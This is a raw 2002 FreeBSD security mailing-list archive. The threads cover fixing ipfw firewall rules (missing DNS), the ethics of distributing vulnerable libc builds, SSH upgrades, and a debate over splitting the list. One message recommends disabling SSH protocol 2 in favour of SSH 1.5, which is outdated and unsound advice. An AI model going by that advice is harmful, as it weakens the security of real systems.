# make dynamic entries for all outgoing traffic
add 500 allow log tcp from me to any 1-65535 keep-state out
add 550 allow log udp from me to any 1-65535 keep-state out

# services we offer to the world
add 600 allow log tcp from any to me 22,5067,5617,8472,10000 keep-state in

# pass ICMP
add 700 allow log icmp from me to any out
add 750 allow log icmp from any to me in

# pass everything on private LAN
add 800 allow log all from 192.168.0.0/16 to any
add 850 allow log all from any to 192.168.0.0/16

# log rejects that have fallen through
add 65000 deny log ip from any to any

With this ruleset I can browse websites, FTP sites etc.

But when I replace rules 500 and 550 with this:

add 500 allow log tcp from me to any 21,80 keep-state out
add 550 allow log udp from me to any 21,80 keep-state out

I cannot access any websites nor FTP sites. But I guess I had just allowed it?

Or is the 'out' the problem here.

Marcel.

On Monday 01 July 2002 06:45 pm, nascar24 wrote:
> What I mean is that I want to grant access to the internet. But only to
> ports I 'trust', like 80,21,22 etc. But when I make a rule like:
>
> add 550 allow ip from me to any 80,21,22
>
> I cannot access a website, that puzzles me.
>

There is a problem with the rule in the example: You allowed traffic to leave through those ports, but not to enter. We can fix this rule:

add 550 allow tcp from me to any 80,21,22 keep-state

I noticed you already had a rule 550 - you may want to give it a different number. IPFW (running 4.5R here) gives the following error when trying to load your rule:

ipfw: only TCP and UDP protocols are valid with port specifications

hence why i changed it from ip to tcp.

GL

--
----------
Ramsey G. Brenner
rgbrenner@myrealbox.com
http://rgbrenner.cjb.net/

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jul 1 18:36: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7BC9137B400 for ; Mon, 1 Jul 2002 18:35:58 -0700 (PDT) Received: from hawk.mail.pas.earthlink.net (hawk.mail.pas.earthlink.net [207.217.120.22]) by mx1.FreeBSD.org (Postfix) with ESMTP id 242B443E09 for ; Mon, 1 Jul 2002 18:35:58 -0700 (PDT) (envelope-from rgbrenner@myrealbox.com) Received: from dialup-209.245.11.78.dial1.denver1.level3.net ([209.245.11.78] helo=localhost) by hawk.mail.pas.earthlink.net with esmtp (Exim 3.33 #1) id 17PCaB-0003ZR-00; Mon, 01 Jul 2002 21:35:55 -0400 Content-Type: text/plain; charset="iso-8859-1" From: "Ramsey G. Brenner" To: nascar24@home.nl Subject: Re: Making a firewall more closed Date: Mon, 1 Jul 2002 19:36:30 -0600 X-Mailer: KMail [version 1.4] References: <01a001c22107$3d3b2850$0200a8c0@winxp> <200207011859.23581.rgbrenner@myrealbox.com> <008d01c22164$89107ac0$0200a8c0@winxp> In-Reply-To: <008d01c22164$89107ac0$0200a8c0@winxp> Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200207011936.30545.rgbrenner@myrealbox.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

You forgot about DNS. If you change rule 550 from

add 550 allow log udp from me to any 21,80 keep-state out

to

add 550 allow log udp from me to any 21,53,80 keep-state out

it should work.

You may want to find out what IPs you use for DNS, and specifically allow those addresses.

I loaded your rules and im not having any problems now.

On Monday 01 July 2002 07:05 pm, nascar24 wrote:
> This is my current ruleset:
>
> # allow loopback traffic
> add 100 allow ip from any to any via lo0
>
> # protect loopback address
> add 200 deny log ip from 127.0.0.1 to any
> add 249 deny log ip from any to 127.0.0.1
>
> # block spoofs
> add 400 deny log ip from me to any in via ed0
>
> # enable NATD
> add 425 divert 8668 ip from any to any via ed0
>
> # check dynamic rules
> add 450 check-state
>
> # make dynamic entries for all outgoing traffic
> add 500 allow log tcp from me to any 1-65535 keep-state out
> add 550 allow log udp from me to any 1-65535 keep-state out
>
> # services we offer to the world
> add 600 allow log tcp from any to me 22,5067,5617,8472,10000 keep-state in
>
> # pass ICMP
> add 700 allow log icmp from me to any out
> add 750 allow log icmp from any to me in
>
> # pass everything on private LAN
> add 800 allow log all from 192.168.0.0/16 to any
> add 850 allow log all from any to 192.168.0.0/16
>
> # log rejects that have fallen through
> add 65000 deny log ip from any to any
>
> With this ruleset I can browse websites, FTP sites etc.
>
> But when I replace rules 500 and 550 with this:
>
> add 500 allow log tcp from me to any 21,80 keep-state out
> add 550 allow log udp from me to any 21,80 keep-state out
>
> I cannot access any websites nor FTP sites. But I guess I had just allowed
> it?
>
> Or is the 'out' the problem here.
>
> Marcel.
>
> On Monday 01 July 2002 06:45 pm, nascar24 wrote:
> > What I mean is that I want to grant access to the internet. But only to
> > ports I 'trust', like 80,21,22 etc. But when I make a rule like:
> >
> > add 550 allow ip from me to any 80,21,22
> >
> > I cannot access a website, that puzzles me.
>
> There is a problem with the rule in the example: You allowed traffic to
> leave through those ports, but not to enter. We can fix this rule:
>
> add 550 allow tcp from me to any 80,21,22 keep-state
>
> I noticed you already had a rule 550 - you may want to give it a different
> number. IPFW (running 4.5R here) gives the following error when trying to
> load your rule:
>
> ipfw: only TCP and UDP protocols are valid with port specifications
>
> hence why i changed it from ip to tcp.
>
> GL

--
----------
Ramsey G. Brenner
rgbrenner@myrealbox.com
http://rgbrenner.cjb.net/

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jul 1 20: 5:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A39A237B405; Mon, 1 Jul 2002 20:05:11 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id C108E43E26; Mon, 1 Jul 2002 20:05:10 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id VAA12696; Mon, 1 Jul 2002 21:04:55 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020701210053.0229c970@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 21:04:50 -0600 To: "Jacques A.
Vidrine" From: Brett Glass Subject: Re: resolv and dynamic linking to compat libc Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020701182234.GO8128@madman.nectar.cc> References: <4.3.2.7.2.20020701120628.023147e0@localhost> <3D1AA5F2.9020305@ca.com> <3D1AA5F2.9020305@ca.com> <4.3.2.7.2.20020701120628.023147e0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:22 PM 7/1/2002, Jacques A. Vidrine wrote: >Gee, I guess we better get cracking to take offline every previous >version of libc, too --- which would mean every version of FreeBSD and >who knows what else. Alas, ethics demand that they be either taken offline or accompanied with a clear, visible, and strong warning. And if compatibility libraries are offered, then yes -- they absolutely should be patched. If you don't, you're distributing vulnerable software, which is not ethical. >How about you help out by enumerating every copy on the Internet, >along with contact information for each? As if you could take those down. But what you *CAN* do is take down vulnerable software and/or accompany by an impossible-to-miss warning. A snapshot of 4.6-STABLE should also be made and released as 4.6.1. 
--Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 20: 9: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 60C0537B400 for ; Mon, 1 Jul 2002 20:09:07 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 94C8343E0A for ; Mon, 1 Jul 2002 20:09:06 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id VAA12730; Mon, 1 Jul 2002 21:08:40 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020701210508.0226bbb0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 21:08:35 -0600 To: Garrett Wollman , Dag-Erling Smorgrav From: Brett Glass Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. Cc: security@FreeBSD.ORG In-Reply-To: <200207011850.g61IolTT078907@khavrinen.lcs.mit.edu> References: <200206301817.EAA05639@caligula.anu.edu.au> <20020701135719.GA65770@palomine.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Garrett, I agree with you. I have wiped the base install from every machine I administer and built OpenSSH-portable 3.4 instead. I've also turned off ChallengeResponseAuthentication on many machines, as well as protocol version 2 on machines where it's not needed. 
(SSH 1.5 is *slightly* less secure against man-in-the-middle attacks than 2, but not enough to matter -- and all of the recent holes have been in SSH 2.) --Brett At 12:50 PM 7/1/2002, Garrett Wollman wrote: >I don't care about the base-install ssh. Personally, I'd rather it >didn't exist, and I think admins who install it need to have their >heads checked. So there! From owner-freebsd-security Mon Jul 1 20:11:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A147037B400 for ; Mon, 1 Jul 2002 20:11:51 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id D3B9D43E0A for ; Mon, 1 Jul 2002 20:11:50 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id VAA12817 for ; Mon, 1 Jul 2002 21:11:43 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020701210911.022a3650@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 21:11:38 -0600 To: freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Low-volume list Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This isn't the first time that people have asked for a low-volume FreeBSD security list with announcements only. But discussions of security are important, too, and there should be a place for them!
So, perhaps this list should be split into two: "security-announce" (moderated) and "security" (unmoderated). --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 20:15: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8215F37B400 for ; Mon, 1 Jul 2002 20:15:00 -0700 (PDT) Received: from smtp013.mail.yahoo.com (smtp013.mail.yahoo.com [216.136.173.57]) by mx1.FreeBSD.org (Postfix) with SMTP id 7912443E09 for ; Mon, 1 Jul 2002 20:14:59 -0700 (PDT) (envelope-from anthonyrubin@yahoo.com) Received: from w184.z064001133.chi-il.dsl.cnc.net (HELO yahoo.com) (anthonyrubin@64.1.133.184 with plain) by smtp.mail.vip.sc5.yahoo.com with SMTP; 2 Jul 2002 03:14:58 -0000 Message-ID: <3D211AB0.9090001@yahoo.com> Date: Mon, 01 Jul 2002 22:14:56 -0500 From: Anthony Rubin User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Low-volume list References: <4.3.2.7.2.20020701210911.022a3650@localhost> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is everyone unaware of freebsd-security-notifications? Brett Glass wrote: > This isn't the first time that people have asked for a low-volume > FreeBSD security list with announcements only. But discussions of > security are important, too, and there should be a place for them! So, > perhaps this list should be split into two: "security-announce" > (moderated) and "security" (unmoderated). 
> > --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 20:17:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8691B37B400 for ; Mon, 1 Jul 2002 20:17:26 -0700 (PDT) Received: from gate21.fw.porsche.de (gate23.fw.porsche.de [193.174.9.99]) by mx1.FreeBSD.org (Postfix) with SMTP id 5CE7C43E09 for ; Mon, 1 Jul 2002 20:17:25 -0700 (PDT) (envelope-from perisa@porsche.de) Received: (qmail 19283 invoked from network); 2 Jul 2002 03:21:49 -0000 Received: from unknown (HELO wuxin011.ibd.porsche.de) (141.36.65.1) by 193.197.149.150 with SMTP; 2 Jul 2002 03:21:49 -0000 Received: (qmail 18394 invoked from network); 2 Jul 2002 03:17:23 -0000 Received: from wuxws007.ibd.porsche.de (HELO porsche.de) (141.36.2.178) by smtp4cli.ibd.porsche.de with SMTP; 2 Jul 2002 03:17:23 -0000 Message-ID: <3D211BAD.70908@porsche.de> Date: Tue, 02 Jul 2002 05:19:09 +0200 From: Marc Perisa User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc3) Gecko/20020523 X-Accept-Language: en, de-de, es-es MIME-Version: 1.0 To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Low-volume list References: <4.3.2.7.2.20020701210911.022a3650@localhost> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brett Glass wrote: > This isn't the first time that people have asked for a low-volume > FreeBSD security list with announcements only. But discussions of > security are important, too, and there should be a place for them! So, > perhaps this list should be split into two: "security-announce" > (moderated) and "security" (unmoderated). 
> > --Brett > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message quoting http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/eresources.html#ERESOURCES-MAIL ... freebsd-security Security issues freebsd-security-notifications Security notifications ... Rules of the road: * The topic of any posting should adhere to the basic charter of the list it is posted to, e.g. if the list is about technical issues then your posting should contain technical discussion. Ongoing irrelevant chatter or flaming only detracts from the value of the mailing list for everyone on it and will not be tolerated. For free-form discussion on no particular topic, the FreeBSD chat mailing list > is freely available and should be used instead. ... * Personal attacks and profanity (in the context of an argument) are not allowed, and that includes users and developers alike. Gross breaches of netiquette, like excerpting or reposting private mail when permission to do so was not and would not be forthcoming, are frowned upon but not specifically enforced. /However/, there are also very few cases where such content would fit within the charter of a list and it would therefore probably rate a warning (or ban) on that basis alone. ... FREEBSD-SECURITY /Security issues/ FreeBSD computer security issues (DES, Kerberos, known security holes and fixes, etc). This is a technical mailing list for which strictly technical content is expected. 
From owner-freebsd-security Mon Jul 1 20:20: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EC1AA37B400 for ; Mon, 1 Jul 2002 20:20:03 -0700 (PDT) Received: from intense.net (server.intense.net [199.217.236.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6046E43E0A for ; Mon, 1 Jul 2002 20:20:03 -0700 (PDT) (envelope-from bobber@intense.net) Received: (from root@localhost) by intense.net (8.12.3/8.12.3) id g623K2Zl014112 for freebsd-security@freebsd.org; Mon, 1 Jul 2002 22:20:02 -0500 (CDT) (envelope-from bobber@intense.net) Received: from bob (209.248.134.245.nw.nuvox.net [209.248.134.245]) by intense.net (8.12.3/8.12.3av) with SMTP id g623JxZB014101 for ; Mon, 1 Jul 2002 22:20:00 -0500 (CDT) (envelope-from bobber@intense.net) Message-ID: <0a0a01c22176$c81879e0$6c01a8c0@metropark.metropark.com> From: "Robert Herrold" To: References: <4.3.2.7.2.20020701210911.022a3650@localhost> Subject: Re: Low-volume list Date: Mon, 1 Jul 2002 22:15:51 -0500 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well, I personally like to read the threads of workarounds, consequences, experiences, etc (less the morons who don't like to read and tend to flame). IMHO, I like the list "just the way it is" (however without the spam).
Robert Herrold Senior Network Engineer Metropark Communications INC 10405 Baur Blvd Suite A St Louis MO 63132 314-439-1900 voice 314-439-1313 fax http://www.metropark.com ----- Original Message ----- From: "Brett Glass" To: Sent: Monday, July 01, 2002 10:11 PM Subject: Low-volume list > This isn't the first time that people have asked for a low-volume FreeBSD > security list with announcements only. But discussions of security are > important, too, and there should be a place for them! So, perhaps this > list should be split into two: "security-announce" (moderated) and > "security" (unmoderated). > > --Brett > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 21:27:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 28B9A37B400 for ; Mon, 1 Jul 2002 21:27:46 -0700 (PDT) Received: from scfep01.kcom.ne.jp (scfep01.kcom.ne.jp [203.141.160.36]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3442E43E09 for ; Mon, 1 Jul 2002 21:27:45 -0700 (PDT) (envelope-from ohmori@korg.co.jp) Received: from scengine03.kcom.ne.jp (scengine03.kcom.ne.jp [203.141.160.42]) by scfep01.kcom.ne.jp (8.11.3/3.7W-o020702) with ESMTP id g624RbY14159; Tue, 2 Jul 2002 13:27:37 +0900 (JST) Received: from scfep02.kcom.ne.jp (scfep02.kcom.ne.jp [203.141.160.37:25]) by scengine03.kcom.ne.jp (Postfix) with ESMTP id CAFD51F02EA for ; Tue, 2 Jul 2002 13:27:31 +0900 (JST) Received: from mail.korg.co.jp (mail.korg.co.jp [203.141.175.50]) by scfep02.kcom.ne.jp (8.11.3/3.7W-i020702) with ESMTP id g624RVJ18252; Tue, 2 Jul 2002 13:27:31 +0900 (JST) Received: from deBroglie ([192.168.221.129]) by mail.korg.co.jp (8.10.2/8.10.2) with ESMTP id g624RVV25172 for ; Tue, 2 Jul 2002 13:27:31 
+0900 To: freebsd-security@FreeBSD.ORG From: OHMORI HIDEKI Message-Id: <200207021329.BGD13092.SPIJNP@korg.co.jp> X-Mailer: Winbiff [Version 2.34PL1] X-Accept-Language: ja,en Date: Tue, 2 Jul 2002 13:29:12 +0900 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org auth 0a901458 subscribe freebsd-security ohmori@korg.co.jp To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 21:59:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 01B9C37B400 for ; Mon, 1 Jul 2002 21:59:15 -0700 (PDT) Received: from pimout5-int.prodigy.net (pimout5-ext.prodigy.net [207.115.63.98]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3FFEF43E13 for ; Mon, 1 Jul 2002 21:59:14 -0700 (PDT) (envelope-from michael@ursine.com) Received: from mbryan (adsl-66-122-17-70.dsl.scrm01.pacbell.net [66.122.17.70]) by pimout5-int.prodigy.net (8.11.0/8.11.0) with ESMTP id g624xCK137868; Tue, 2 Jul 2002 00:59:13 -0400 Message-ID: <200207012159020190.0FA21A9E@smtp.sbcglobal.net> In-Reply-To: <4.3.2.7.2.20020701210911.022a3650@localhost> References: <4.3.2.7.2.20020701210911.022a3650@localhost> X-Mailer: Calypso Version 3.00.00.13 (2) Date: Mon, 01 Jul 2002 21:59:02 -0700 From: "Michael Bryan" To: freebsd-security@FreeBSD.ORG Cc: brett@lariat.org Subject: Re: Low-volume list Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 7/1/02 at 9:11 PM Brett Glass wrote: >This isn't the first 
time that people have asked for a low-volume FreeBSD >security list with announcements only. But discussions of security are >important, too, and there should be a place for them! So, perhaps this >list should be split into two: "security-announce" (moderated) and >"security" (unmoderated). Yeah, you're right! Too bad the FreeBSD team never thought of that!!! Oh wait, they did, years ago, explaining why one of my mail folders contains -only- FreeBSD security announcements: http://www.freebsd.org/security/security.html#ml Sheesh. RTFM. (RTFWP?) -- Michael Bryan michael@ursine.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 22:44:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2EBA937B400 for ; Mon, 1 Jul 2002 22:44:21 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id E9BE743E0A for ; Mon, 1 Jul 2002 22:44:20 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 9155E8B5CE; Mon, 1 Jul 2002 22:44:20 -0700 (PDT) Message-ID: <3D213DB4.29DB6745@FreeBSD.org> Date: Mon, 01 Jul 2002 22:44:20 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Low-volume list References: <4.3.2.7.2.20020701210911.022a3650@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The thing 
that people are actually asking for is a better signal-to-noise ratio. Thus, my consistent requests for people to stay on topic. Doug From owner-freebsd-security Tue Jul 2 1:15:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ABAA837B400 for ; Tue, 2 Jul 2002 01:15:31 -0700 (PDT) Received: from plamen.bgstore.com (bgstore.digsys.bg [193.68.22.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 23FE643E0A for ; Tue, 2 Jul 2002 01:15:28 -0700 (PDT) (envelope-from plamendp@bgstore.com) Received: from ilkom1 ([217.79.73.98]) by plamen.bgstore.com (8.12.5/8.12.5) with SMTP id g628HBeW054927; Tue, 2 Jul 2002 11:17:27 +0300 (EEST) (envelope-from plamendp@bgstore.com) Message-ID: <007b01c221a8$e9a19ba0$62494fd9@f2f.cx> From: "Plamen Petkov" To: "Kevin Kinsey, DaleCo, S.P." Cc: References: <20020701141839.V50179-100000@mohegan.mohawk.net> <008401c22136$08d62e00$edec910c@fbccarthage.com> Subject: Re: security fixes Date: Tue, 2 Jul 2002 11:14:30 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, For 2-3 years I haven't had any problems cvsuping only *-STABLE. It's a matter of trust in the core team, all committers, etc. that -STABLE is *really* stable :-) So, I always cvsup -STABLE (RELENG_4 at the moment) and everything is OK. Of course, I first cvsup on a dev machine and test if it's OK, then cvsup on the production machine(s).
Just to be sure there is nothing wrong with cvsup server I use. Regards, --- Plamen D. Petkov, ICQ# 2214327 plamendp@bgstore.com http://www.bgstore.com > > With all the traffic surrounding these recent vulnerabilities, it's a > > little confusing to know what one has to do and need not do. Let me ask > > this one question, please: > > > > In cvsup'ing the patched sources, if I have a 4.6-RELEASE box, should I > > cvsup RELENG_4_6 and for the earlier 4.x machines cvsup RELENG_4 ??? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 1:16:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 15EC037B400 for ; Tue, 2 Jul 2002 01:16:08 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 07B6F43E0A for ; Tue, 2 Jul 2002 01:16:07 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id CAA15723; Tue, 2 Jul 2002 02:15:49 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. 
Message-Id: <4.3.2.7.2.20020702021318.00d4d740@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 02 Jul 2002 02:15:45 -0600 To: "Michael Bryan" , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: Low-volume list In-Reply-To: <200207012159020190.0FA21A9E@smtp.sbcglobal.net> References: <4.3.2.7.2.20020701210911.022a3650@localhost> <4.3.2.7.2.20020701210911.022a3650@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 10:59 PM 7/1/2002, Michael Bryan wrote: >Yeah, you're right! Too bad the FreeBSD team never thought of that!!! > >Oh wait, they did, years ago, explaining why one of my mail folders >contains -only- FreeBSD security announcements: > >http://www.freebsd.org/security/security.html#ml > >Sheesh. RTFM. (RTFWP?) CFTFWP (Couldn't find the fine Web page), I guess. In any event, most people seem to believe that -security is the low volume list. If that's not its charter, then why all the complaints when there is (horrors!) a discussion? 
--Brett From owner-freebsd-security Tue Jul 2 1:23:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C866637B405 for ; Tue, 2 Jul 2002 01:23:03 -0700 (PDT) Received: from plamen.bgstore.com (bgstore.digsys.bg [193.68.22.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0D93943E26 for ; Tue, 2 Jul 2002 01:23:01 -0700 (PDT) (envelope-from plamendp@bgstore.com) Received: from ilkom1 ([217.79.73.98]) by plamen.bgstore.com (8.12.5/8.12.5) with SMTP id g628PDeW055142 for ; Tue, 2 Jul 2002 11:25:14 +0300 (EEST) (envelope-from plamendp@bgstore.com) Message-ID: <008701c221a9$ff8cc380$62494fd9@f2f.cx> From: "Plamen Petkov" To: References: <20020701153650.Q50179-100000@mohegan.mohawk.net> <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> Subject: Re: security fixes Date: Tue, 2 Jul 2002 11:22:32 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web 